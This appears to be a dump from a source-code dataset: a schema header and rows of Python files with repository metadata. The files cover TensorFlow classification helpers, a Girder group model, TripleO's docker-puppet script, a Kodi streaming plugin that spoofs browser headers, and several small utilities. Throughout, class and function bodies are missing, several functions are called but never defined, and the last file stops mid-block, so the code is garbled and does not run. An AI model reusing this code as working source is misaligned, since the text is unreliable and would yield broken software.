hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 11
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
251
| max_stars_repo_name
stringlengths 4
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
251
| max_issues_repo_name
stringlengths 4
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
251
| max_forks_repo_name
stringlengths 4
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.05M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.04M
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4c1514125da0b6d26946b5990ca8e3d69b019fd3
| 1,369 |
py
|
Python
|
tests/core/feature_extraction/test_galaxyProcessor.py
|
EmilioCC/gti770-student-framework
|
3cd72da8fe78c7ecfc26c9e688cbe1b7deee353a
|
[
"MIT"
] | null | null | null |
tests/core/feature_extraction/test_galaxyProcessor.py
|
EmilioCC/gti770-student-framework
|
3cd72da8fe78c7ecfc26c9e688cbe1b7deee353a
|
[
"MIT"
] | null | null | null |
tests/core/feature_extraction/test_galaxyProcessor.py
|
EmilioCC/gti770-student-framework
|
3cd72da8fe78c7ecfc26c9e688cbe1b7deee353a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import numpy as np
from unittest import TestCase
from core.feature_extraction.galaxy.galaxy_processor import GalaxyProcessor
from commons.helpers.dataset.strategies.galaxy_dataset.label_strategy import GalaxyDataSetLabelStrategy
from commons.helpers.dataset.context import Context
| 42.78125 | 103 | 0.731921 |
4c1540d22f910c13d547019d54ee005a23d41b8e
| 559 |
py
|
Python
|
country/management/commands/populate_countries.py
|
okchaty/django-country
|
740bc25956dc1b87f44486538a62037e0bd0ac94
|
[
"MIT"
] | 1 |
2020-04-02T16:50:38.000Z
|
2020-04-02T16:50:38.000Z
|
country/management/commands/populate_countries.py
|
okchaty/django-country
|
740bc25956dc1b87f44486538a62037e0bd0ac94
|
[
"MIT"
] | 4 |
2020-03-30T15:39:55.000Z
|
2020-04-10T15:04:28.000Z
|
country/management/commands/populate_countries.py
|
okchaty/django-country
|
740bc25956dc1b87f44486538a62037e0bd0ac94
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.core.management import call_command
from django.core.management.base import BaseCommand
from os import path
| 27.95 | 56 | 0.615385 |
4c155f18a1b1670b63f094d3de08857496d9f8be
| 1,630 |
py
|
Python
|
gmso/formats/formats_registry.py
|
chrisiacovella/gmso
|
c78e2425ccb98ea952f024a569346d36045f6918
|
[
"MIT"
] | 20 |
2020-02-28T21:47:54.000Z
|
2022-02-14T20:13:56.000Z
|
gmso/formats/formats_registry.py
|
chrisiacovella/gmso
|
c78e2425ccb98ea952f024a569346d36045f6918
|
[
"MIT"
] | 364 |
2020-03-02T16:11:57.000Z
|
2022-03-29T00:57:00.000Z
|
gmso/formats/formats_registry.py
|
chrisiacovella/gmso
|
c78e2425ccb98ea952f024a569346d36045f6918
|
[
"MIT"
] | 28 |
2020-02-28T21:12:30.000Z
|
2022-01-31T21:02:30.000Z
|
"""Registry utilities to handle formats for gmso Topology."""
SaversRegistry = Registry()
LoadersRegistry = Registry()
| 28.596491 | 86 | 0.655828 |
4c1606fa8a8ca96d6fb7ac7c7412b894e0bb3a10
| 417 |
py
|
Python
|
formatter.py
|
Staist/Python-Text-Formatter
|
6ae865d45301906eaa133551301dc785602f5b38
|
[
"MIT"
] | null | null | null |
formatter.py
|
Staist/Python-Text-Formatter
|
6ae865d45301906eaa133551301dc785602f5b38
|
[
"MIT"
] | null | null | null |
formatter.py
|
Staist/Python-Text-Formatter
|
6ae865d45301906eaa133551301dc785602f5b38
|
[
"MIT"
] | null | null | null |
dosyaadi = input("Enter file name: ")
dosyaadi = str(dosyaadi + ".txt")
with open(dosyaadi, 'r') as file :
dosyaicerigi = file.read()
silinecek = str(input("Enter the text that you wish to delete: "))
dosyaicerigi = dosyaicerigi.replace(silinecek, '')
with open(dosyaadi, 'w') as file:
file.write(dosyaicerigi)
file.close()
print("-" * 30)
print("Successfully deleted!")
print("-" * 30)
| 26.0625 | 67 | 0.647482 |
4c168858057ebcae4ef4e91a7860a8034fcefa15
| 6,106 |
py
|
Python
|
covid19/classification/helpers.py
|
salvacarrion/mltests
|
e4ac9711c1c80171f302edc88011fbe06e754490
|
[
"MIT"
] | null | null | null |
covid19/classification/helpers.py
|
salvacarrion/mltests
|
e4ac9711c1c80171f302edc88011fbe06e754490
|
[
"MIT"
] | 1 |
2022-01-01T06:09:26.000Z
|
2022-01-01T06:09:26.000Z
|
covid19/classification/helpers.py
|
salvacarrion/mltests
|
e4ac9711c1c80171f302edc88011fbe06e754490
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
class CustomModelCheckpoint(tf.keras.callbacks.ModelCheckpoint):
class CustomEarlyStopping(tf.keras.callbacks.EarlyStopping):
def get_losses():
losses = [tf.keras.losses.BinaryCrossentropy()]
return losses
def get_metrics(single_output_idx, add_normal=False):
metrics = []
if single_output_idx is None: # Multi-label
print("###### Multi-label classification ######")
metrics += [
BinaryAccuracy_Infiltrates,
BinaryAccuracy_Pneumonia,
BinaryAccuracy_Covid19
]
# Add normal class
if add_normal:
metrics.append(BinaryAccuracy_Normal)
else:
print(f"###### Multi-class classification (cls: '{single_output_idx}') ######")
metrics = [
tf.keras.metrics.BinaryAccuracy(),
tf.keras.metrics.AUC(),
tf.keras.metrics.Precision(),
tf.keras.metrics.Recall()
]
return metrics
def get_model(backbone, classes=None, target_size=None, freeze_base_model=True, ignore_model=None):
istrainable = not freeze_base_model
# Select backbone
if backbone == "resnet50":
from tensorflow.keras.applications.resnet import ResNet50 as TFModel
from tensorflow.keras.applications.resnet import preprocess_input
elif backbone == "resnet50v2":
from tensorflow.keras.applications.resnet_v2 import ResNet50V2 as TFModel
from tensorflow.keras.applications.resnet_v2 import preprocess_input
elif backbone == "resnet101v2":
from tensorflow.keras.applications.resnet_v2 import ResNet101V2 as TFModel
from tensorflow.keras.applications.resnet_v2 import preprocess_input
elif backbone == "vgg16":
from tensorflow.keras.applications.vgg16 import VGG16 as TFModel
from tensorflow.keras.applications.vgg16 import preprocess_input
elif backbone == "efficientnetb0":
from tensorflow.keras.applications.efficientnet import EfficientNetB0 as TFModel
from tensorflow.keras.applications.efficientnet import preprocess_input
elif backbone == "efficientnetb7":
from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel
from tensorflow.keras.applications.efficientnet import preprocess_input
else:
raise ValueError(f"Unknown backbone: {backbone}")
if ignore_model:
model = None
else:
# Instantiate base model with pre-trained weights
base_model = TFModel(input_shape=(*target_size, 3), include_top=False, weights="imagenet")
# Freeze base model
# base_model.trainable = istrainable
for layers in base_model.layers:
layers.trainable = istrainable
# Create a new model on top
inputs = base_model.input
x = base_model(inputs)
# Option A
x = tf.keras.layers.GlobalAveragePooling2D(name='avg_pool')(x)
# Option B
# x = tf.keras.layers.Flatten(name='flatten')(x)
# x = tf.keras.layers.Dense(512, activation='relu', name='fc1')(x)
# x = tf.keras.layers.Dense(512, activation='relu', name='fc2')(x)
# Outputs
outputs = tf.keras.layers.Dense(classes, activation="sigmoid", name='predictions')(x)
model = tf.keras.Model(inputs, outputs)
return model, preprocess_input
def add_tabular_input(model, classes):
# Input1
input1 = model.input
input2 = tf.keras.layers.Input(shape=(2,), name="input_2b")
# Pre-outputs 1x3 + 1x3
output1 = model.output
output2 = tf.keras.layers.Dense(classes, activation="sigmoid", name='output_tab')(input2)
# Outputs
x = tf.keras.layers.Concatenate(axis=1)([output1, output2])
output = tf.keras.layers.Dense(classes, activation="sigmoid", name='final_predictions')(x)
model = tf.keras.Model([input1, input2], output)
return model
def unfreeze_base_model(model, n=None, unfreeze=True):
base_model = model.layers[1].layers
# Select number of layers to unfreeze
idx = 0
if n is not None:
if isinstance(n, int):
idx = n
print(f"Unfreezing {len(base_model) - idx} layers")
elif isinstance(n, float) and 0.0 < n <= 1.0:
idx = int(len(base_model) * n)
print(f"Unfreezing {idx} layers")
else:
raise ValueError("Invalid number of layers")
# We unfreeze all layers but BatchNorm (to not destroy the non-trainable weights)
for layer in base_model[-idx:]:
if not isinstance(layer, tf.keras.layers.BatchNormalization):
layer.trainable = True
| 35.5 | 104 | 0.664265 |
4c16d8f05cc4bb4747f1b27b93145e440fc653d6
| 3,528 |
py
|
Python
|
null/twitter/twmedia-dl.py
|
mikoim/funstuff
|
3c391c76784a4bb37983c1a251773bfa61182ce1
|
[
"MIT"
] | null | null | null |
null/twitter/twmedia-dl.py
|
mikoim/funstuff
|
3c391c76784a4bb37983c1a251773bfa61182ce1
|
[
"MIT"
] | null | null | null |
null/twitter/twmedia-dl.py
|
mikoim/funstuff
|
3c391c76784a4bb37983c1a251773bfa61182ce1
|
[
"MIT"
] | null | null | null |
import re
import json
import time
import sys
import httplib2
from twitter import *
import magic
if __name__ == '__main__':
for i in range(1, len(sys.argv)):
tw = TwitterMediaDL()
for tweetID in tw.get_medias(sys.argv[i]):
list_url = tw.get_image_url(tweetID)
for j in range(0, len(list_url)):
raw = tw.http_wrapper(list_url[j])
ext = tw.get_file_extension(raw)
with open('{:d}_{:d}.{:s}'.format(tweetID, j, ext), 'wb') as f:
f.write(raw)
| 30.947368 | 133 | 0.552721 |
4c16fb50407c0d81665fb35d2265d078805475a6
| 6,185 |
py
|
Python
|
tensorflow/contrib/metrics/__init__.py
|
DEVESHTARASIA/tensorflow
|
d3edb8c60ed4fd831d62833ed22f5c23486c561c
|
[
"Apache-2.0"
] | 384 |
2017-02-21T18:38:04.000Z
|
2022-02-22T07:30:25.000Z
|
tensorflow/contrib/metrics/__init__.py
|
ChenAugustus/tensorflow
|
5828e285209ff8c3d1bef2e4bd7c55ca611080d5
|
[
"Apache-2.0"
] | 15 |
2017-03-01T20:18:43.000Z
|
2020-05-07T10:33:51.000Z
|
udacity-car/lib/python2.7/site-packages/tensorflow/contrib/metrics/__init__.py
|
808brick/CarND-Capstone
|
f9e536b4a9d96322d7e971073602c8969dbd9369
|
[
"MIT"
] | 81 |
2017-02-21T19:31:19.000Z
|
2022-02-22T07:30:24.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for evaluation metrics and summary statistics.
See the @{$python/contrib.metrics} guide.
@@streaming_accuracy
@@streaming_mean
@@streaming_recall
@@streaming_recall_at_thresholds
@@streaming_precision
@@streaming_precision_at_thresholds
@@streaming_auc
@@streaming_curve_points
@@streaming_recall_at_k
@@streaming_mean_absolute_error
@@streaming_mean_iou
@@streaming_mean_relative_error
@@streaming_mean_squared_error
@@streaming_mean_tensor
@@streaming_root_mean_squared_error
@@streaming_covariance
@@streaming_pearson_correlation
@@streaming_mean_cosine_distance
@@streaming_percentage_less
@@streaming_sensitivity_at_specificity
@@streaming_sparse_average_precision_at_k
@@streaming_sparse_average_precision_at_top_k
@@streaming_sparse_precision_at_k
@@streaming_sparse_precision_at_top_k
@@streaming_sparse_recall_at_k
@@streaming_specificity_at_sensitivity
@@streaming_concat
@@streaming_false_negatives
@@streaming_false_negatives_at_thresholds
@@streaming_false_positives
@@streaming_false_positives_at_thresholds
@@streaming_true_negatives
@@streaming_true_negatives_at_thresholds
@@streaming_true_positives
@@streaming_true_positives_at_thresholds
@@auc_using_histogram
@@accuracy
@@aggregate_metrics
@@aggregate_metric_map
@@confusion_matrix
@@set_difference
@@set_intersection
@@set_size
@@set_union
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,g-importing-member,wildcard-import
from tensorflow.contrib.metrics.python.metrics import *
# pylint: enable=wildcard-import
from tensorflow.contrib.metrics.python.ops.confusion_matrix_ops import confusion_matrix
from tensorflow.contrib.metrics.python.ops.histogram_ops import auc_using_histogram
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metric_map
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metrics
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_accuracy
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_auc
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_concat
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_covariance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_curve_points
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_absolute_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_cosine_distance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_iou
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_relative_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_tensor
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_pearson_correlation
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_percentage_less
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_root_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sensitivity_at_specificity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_specificity_at_sensitivity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.set_ops import set_difference
from tensorflow.contrib.metrics.python.ops.set_ops import set_intersection
from tensorflow.contrib.metrics.python.ops.set_ops import set_size
from tensorflow.contrib.metrics.python.ops.set_ops import set_union
# pylint: enable=unused-import,line-too-long
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
| 51.97479 | 104 | 0.864834 |
4c189de34ca4832b1a00970032415cde76a25896
| 9,133 |
py
|
Python
|
girder/models/group.py
|
scottwittenburg/girder
|
a5062badc97bf2a87a385648f2ff3f9ff1990a75
|
[
"Apache-2.0"
] | null | null | null |
girder/models/group.py
|
scottwittenburg/girder
|
a5062badc97bf2a87a385648f2ff3f9ff1990a75
|
[
"Apache-2.0"
] | null | null | null |
girder/models/group.py
|
scottwittenburg/girder
|
a5062badc97bf2a87a385648f2ff3f9ff1990a75
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import datetime
from .model_base import AccessControlledModel,\
ValidationException,\
AccessException
from girder.constants import AccessType
| 34.858779 | 79 | 0.581518 |
4c193e499f0f1632e4dcf16c607003de7e5c3eaa
| 14,091 |
py
|
Python
|
docker/docker-puppet.py
|
mail2nsrajesh/tripleo-heat-templates
|
368b3eadda577f9914d181893df2df96367e8fad
|
[
"Apache-2.0"
] | null | null | null |
docker/docker-puppet.py
|
mail2nsrajesh/tripleo-heat-templates
|
368b3eadda577f9914d181893df2df96367e8fad
|
[
"Apache-2.0"
] | null | null | null |
docker/docker-puppet.py
|
mail2nsrajesh/tripleo-heat-templates
|
368b3eadda577f9914d181893df2df96367e8fad
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Shell script tool to run puppet inside of the given docker container image.
# Uses the config file at /var/lib/docker-puppet/docker-puppet.json as a source for a JSON
# array of [config_volume, puppet_tags, manifest, config_image, [volumes]] settings
# that can be used to generate config files or run ad-hoc puppet modules
# inside of a container.
import glob
import json
import logging
import os
import sys
import subprocess
import sys
import tempfile
import multiprocessing
log = logging.getLogger()
ch = logging.StreamHandler(sys.stdout)
if os.environ.get('DEBUG', False):
log.setLevel(logging.DEBUG)
ch.setLevel(logging.DEBUG)
else:
log.setLevel(logging.INFO)
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
# this is to match what we do in deployed-server
process_count = int(os.environ.get('PROCESS_COUNT',
multiprocessing.cpu_count()))
log.info('Running docker-puppet')
config_file = os.environ.get('CONFIG', '/var/lib/docker-puppet/docker-puppet.json')
log.debug('CONFIG: %s' % config_file)
with open(config_file) as f:
json_data = json.load(f)
# To save time we support configuring 'shared' services at the same
# time. For example configuring all of the heat services
# in a single container pass makes sense and will save some time.
# To support this we merge shared settings together here.
#
# We key off of config_volume as this should be the same for a
# given group of services. We are also now specifying the container
# in which the services should be configured. This should match
# in all instances where the volume name is also the same.
configs = {}
for service in (json_data or []):
if service is None:
continue
if isinstance(service, dict):
service = [
service.get('config_volume'),
service.get('puppet_tags'),
service.get('step_config'),
service.get('config_image'),
service.get('volumes', []),
]
config_volume = service[0] or ''
puppet_tags = service[1] or ''
manifest = service[2] or ''
config_image = service[3] or ''
volumes = service[4] if len(service) > 4 else []
if not manifest or not config_image:
continue
log.info('config_volume %s' % config_volume)
log.info('puppet_tags %s' % puppet_tags)
log.info('manifest %s' % manifest)
log.info('config_image %s' % config_image)
log.info('volumes %s' % volumes)
# We key off of config volume for all configs.
if config_volume in configs:
# Append puppet tags and manifest.
log.info("Existing service, appending puppet tags and manifest")
if puppet_tags:
configs[config_volume][1] = '%s,%s' % (configs[config_volume][1],
puppet_tags)
if manifest:
configs[config_volume][2] = '%s\n%s' % (configs[config_volume][2],
manifest)
if configs[config_volume][3] != config_image:
log.warn("Config containers do not match even though"
" shared volumes are the same!")
else:
log.info("Adding new service")
configs[config_volume] = service
log.info('Service compilation completed.')
# Holds all the information for each process to consume.
# Instead of starting them all linearly we run them using a process
# pool. This creates a list of arguments for the above function
# to consume.
process_map = []
for config_volume in configs:
service = configs[config_volume]
puppet_tags = service[1] or ''
manifest = service[2] or ''
config_image = service[3] or ''
volumes = service[4] if len(service) > 4 else []
if puppet_tags:
puppet_tags = "file,file_line,concat,augeas,%s" % puppet_tags
else:
puppet_tags = "file,file_line,concat,augeas"
process_map.append([config_volume, puppet_tags, manifest, config_image, volumes])
for p in process_map:
log.debug('- %s' % p)
# Fire off processes to perform each configuration. Defaults
# to the number of CPUs on the system.
p = multiprocessing.Pool(process_count)
returncodes = list(p.map(mp_puppet_config, process_map))
config_volumes = [pm[0] for pm in process_map]
success = True
for returncode, config_volume in zip(returncodes, config_volumes):
if returncode != 0:
log.error('ERROR configuring %s' % config_volume)
success = False
# Update the startup configs with the config hash we generated above
config_volume_prefix = os.environ.get('CONFIG_VOLUME_PREFIX', '/var/lib/config-data')
log.debug('CONFIG_VOLUME_PREFIX: %s' % config_volume_prefix)
startup_configs = os.environ.get('STARTUP_CONFIG_PATTERN', '/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
log.debug('STARTUP_CONFIG_PATTERN: %s' % startup_configs)
infiles = glob.glob('/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
for infile in infiles:
with open(infile) as f:
infile_data = json.load(f)
for k, v in infile_data.iteritems():
config_volume = match_config_volume(config_volume_prefix, v)
if config_volume:
config_hash = get_config_hash(config_volume_prefix, config_volume)
if config_hash:
env = v.get('environment', [])
env.append("TRIPLEO_CONFIG_HASH=%s" % config_hash)
log.debug("Updating config hash for %s, config_volume=%s hash=%s" % (k, config_volume, config_hash))
infile_data[k]['environment'] = env
outfile = os.path.join(os.path.dirname(infile), "hashed-" + os.path.basename(infile))
with open(outfile, 'w') as out_f:
json.dump(infile_data, out_f)
if not success:
sys.exit(1)
| 39.581461 | 139 | 0.613299 |
4c1a065c357d38d64659fb6993766afa52a31235
| 9,999 |
py
|
Python
|
main.py
|
acitv/plugin.video.aci
|
c836096c90affd80949e51cd24517709a63eff52
|
[
"MIT"
] | null | null | null |
main.py
|
acitv/plugin.video.aci
|
c836096c90affd80949e51cd24517709a63eff52
|
[
"MIT"
] | null | null | null |
main.py
|
acitv/plugin.video.aci
|
c836096c90affd80949e51cd24517709a63eff52
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import urllib
import urlparse
# import xbmc
import xbmcgui
import xbmcplugin
import aci
# Get the plugin url in plugin:// notation.
_url = sys.argv[0]
# Get the plugin handle as an integer number.
_handle = int(sys.argv[1])
# Get an instance of ACI.
ATV = aci.ACI()
ATV.load_aci()
# Encode user agent headers for video.
user_agent_headers = urllib.urlencode({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 '
'Firefox/47.0 FirePHP/0.7.4',
'X-Requested-With': 'ShockwaveFlash/22.0.0.192'
})
def get_url(**kwargs):
"""
Create a URL for calling the plugin recursively from the given set of keyword arguments.
:param kwargs: "argument=value" pairs
:type kwargs: dict
:return: plugin call URL
:rtype: str
"""
return '{0}?{1}'.format(_url, urllib.urlencode(kwargs))
def get_categories():
"""
Get the list of video categories.
Here you can insert some parsing code that retrieves
the list of video categories (e.g. 'Movies', 'TV-shows', 'Documentaries' etc.)
from some site or server.
.. note:: Consider using `generator functions <https://wiki.python.org/moin/Generators>`_
instead of returning lists.
:return: The list of video categories
:rtype: types.GeneratorType
"""
return ATV.aci.iterkeys()
def get_videos(category):
"""
Get the list of video files/streams.
Here you can insert some parsing code that retrieves
the list of video streams in the given category from some site or server.
.. note:: Consider using `generators functions <https://wiki.python.org/moin/Generators>`_
instead of returning lists.
:param category: Category name
:type category: str
:return: the list of videos in the category
:rtype: list
"""
return ATV.aci[category]
def list_categories():
"""
Create the list of video categories in the Kodi interface.
"""
# Set plugin category. It is displayed in some skins as the name
# of the current section.
xbmcplugin.setPluginCategory(_handle, 'ACI')
# Set plugin content. It allows Kodi to select appropriate views
# for this type of content.
xbmcplugin.setContent(_handle, 'videos')
# Get video categories
categories = get_categories()
# Iterate through categories
for category in categories:
# xbmc.log(category.encode("utf-8"), xbmc.LOGNOTICE)
# Create a list item with a text label and a thumbnail image.
list_item = xbmcgui.ListItem(label=category.title())
# Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
# Here we use the same image for all items for simplicity's sake.
# In a real-life plugin you need to set each image accordingly.
list_item.setArt({'thumb': "icon.png",
'icon': "icon.png",
'fanart': "icon.png"})
# Set additional info for the list item.
# Here we use a category name for both properties for for simplicity's sake.
# setInfo allows to set various information for an item.
# For available properties see the following link:
# https://codedocs.xyz/xbmc/xbmc/group__python__xbmcgui__listitem.html#ga0b71166869bda87ad744942888fb5f14
# 'mediatype' is needed for a skin to display info for this ListItem correctly.
list_item.setInfo('video', {'title': category.title(),
'genre': category.title(),
'mediatype': 'video'})
# Create a URL for a plugin recursive call.
# Example: plugin://plugin.video.example/?action=listing&category=[category name]
url = get_url(action="listing", category=category)
# is_folder = True means that this item opens a sub-list of lower level items.
is_folder = True
# Add our item to the Kodi virtual folder listing.
xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
# Add a sort method for the virtual folder items (alphabetically, ignore articles)
xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def list_videos(category):
"""
Create the list of playable videos in the Kodi interface.
:param category: Category name
:type category: str
"""
# Set plugin category. It is displayed in some skins as the name
# of the current section.
xbmcplugin.setPluginCategory(_handle, category)
# Set plugin content. It allows Kodi to select appropriate views
# for this type of content.
xbmcplugin.setContent(_handle, 'videos')
# Get the list of videos in the category.
videos = get_videos(category)
# Iterate through each video.
for video_id in videos:
# Get the video item to process.
video_item = videos[video_id]
# Create a list item with a text label and a thumbnail image.
list_item = xbmcgui.ListItem(label=video_item["title"])
# Set additional info for the list item.
# 'mediatype' is needed for skin to display info for this ListItem correctly.
list_item.setInfo('video', {'title': video_item["title"],
'genre': category.title(),
'mediatype': 'video'})
# Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
# Here we use the same image for all items for simplicity's sake.
# In a real-life plugin you need to set each image accordingly.
list_item.setArt({'thumb': video_item["thumbnail"],
'icon': video_item["thumbnail"],
'fanart': video_item["thumbnail"]
})
# Set 'IsPlayable' property to 'true'.
# This is mandatory for playable items!
list_item.setProperty('IsPlayable', 'true')
referer_header = urllib.urlencode({"Referer": video_item["location"]})
video_item['url'] += '|%s&%s' % (user_agent_headers, referer_header)
# Create a URL for a plugin recursive call.
# Example: plugin://plugin.video.example/?action=play&
# video=[video url]
url = get_url(action='play', video=video_item['url'])
# video_url = 'plugin://plugin.video.f4mTester/?url=' + urllib.quote_plus(video['video']) + \
# '&streamtype=HLSRETRY&name=' + urllib.quote_plus(video['name']) + \
# '&|User-Agent=Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 ' \
# 'FirePHP/0.7.4&X-Requested-With=ShockwaveFlash/22.0.0.192&Referer=' + \
# urllib.quote_plus(video['reference'])
# url = get_url(action='play', video=video_url)
# Add the list item to a virtual Kodi folder.
# is_folder = False means that this item won't open any sub-list.
is_folder = False
# Add our item to the Kodi virtual folder listing.
xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
# Add a sort method for the virtual folder items (alphabetically, ignore articles)
xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def play_video(path):
"""
Play a video by the provided path.
:param path: Fully-qualified video URL
:type path: str
"""
# Create a playable item with a path to play.
play_item = xbmcgui.ListItem(path=path)
# Play with inputstream addon.
play_item.setProperty('inputstreamaddon', 'inputstream.adaptive')
play_item.setProperty('inputstream.adaptive.manifest_type', 'hls')
# Pass the item to the Kodi player.
xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)
def router(paramstring):
"""
Router function that calls other functions
depending on the provided paramstring
:param paramstring: URL encoded plugin paramstring
:type paramstring: str
"""
# Parse a URL-encoded paramstring to the dictionary of
# {<parameter>: <value>} elements
params = dict(urlparse.parse_qsl(paramstring))
# Check the parameters passed to the plugin
if params:
if params['action'] == 'listing':
# Load the videos for aci.
if params['category'] == "shows":
ATV.update_aci_shows()
print("Updated from main shows.")
elif params['category'] == "cable":
ATV.update_aci_cable()
print("Updated from main cable.")
elif params['category'] == "movies":
ATV.update_aci_movies()
print("Updated from main movies.")
# Display the list of videos in a provided category.
list_videos(params['category'])
elif params['action'] == 'play':
# Play a video from a provided URL.
play_video(params['video'])
else:
# If the provided paramstring does not contain a supported action
# we raise an exception. This helps to catch coding errors,
# e.g. typos in action names.
raise ValueError('Invalid paramstring: {0}!'.format(paramstring))
else:
# Load ATV.
ATV.load_aci()
# If the plugin is called from Kodi UI without any parameters,
# display the list of video categories
list_categories()
if __name__ == '__main__':
# Call the router function and pass the plugin call parameters to it.
